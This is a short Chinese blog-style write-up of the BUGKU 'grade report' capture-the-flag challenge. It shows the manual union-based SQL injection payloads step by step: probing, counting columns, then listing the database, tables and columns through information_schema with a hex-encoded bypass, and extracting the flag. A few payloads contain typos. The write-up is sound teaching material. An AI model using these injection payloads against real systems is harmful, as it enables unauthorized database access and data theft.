SQL注入:BUGKU成绩单——手动注入实践

SQL注入:BUGKU成绩单——手动注入实践_第1张图片
打开题目,对于这种题目大家不要慌,我拿到手就会做,好,大家看好,有对话框我们要第一时间想到是不是存在注入。凯斯旺,我们首先按照作者的提示输入一些数字2
SQL注入:BUGKU成绩单——手动注入实践_第2张图片
果然存在注入,我们测试1 and 1=1,1 and 1=2 发现存在sql注入,当确认是sql注入后我们尝试爆出有多少列,确定列数,通过语句 id=-1’ order by 4#发现返回正常,而输入语句id=-1’ order by 5#发现返回错误,因此我们断定拥有4列。接下来我们尝试爆出库名,在这之前我们通过语句 id=-1’ union select 1,2,3,4#来确定每个列是否都回显正常。当我们发现每个列的回显都正常时,我们尝试爆库名!

爆破库名

通过联合查询语句 id=-1’ union select 1,2,3,database()# 可以爆出库名为skctf_flag
SQL注入:BUGKU成绩单——手动注入实践_第3张图片

爆表名

爆出库名后,我们继续通过语句 id=-1’ union select 1,2,3,group_concat(table_name) from information _schema.tables where table_schema=databade()# 爆出表名
SQL注入:BUGKU成绩单——手动注入实践_第4张图片

爆字段名

继续通过语句 id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要通过用16进制绕过
SQL注入:BUGKU成绩单——手动注入实践_第5张图片

爆出flag

所有准备工作都做完后,我们得到以下信息,库名:skctf_flag 表名:fl4g,sc 字段名:skctf_flag
开始查询数据 id=-1’ union select 1,2,3,skctf_flag from fl4g# 得到flag
SQL注入:BUGKU成绩单——手动注入实践_第6张图片

总结

对于spl注入的手工注入,有了些经验,继续加油把!

你可能感兴趣的:(CTF,sql)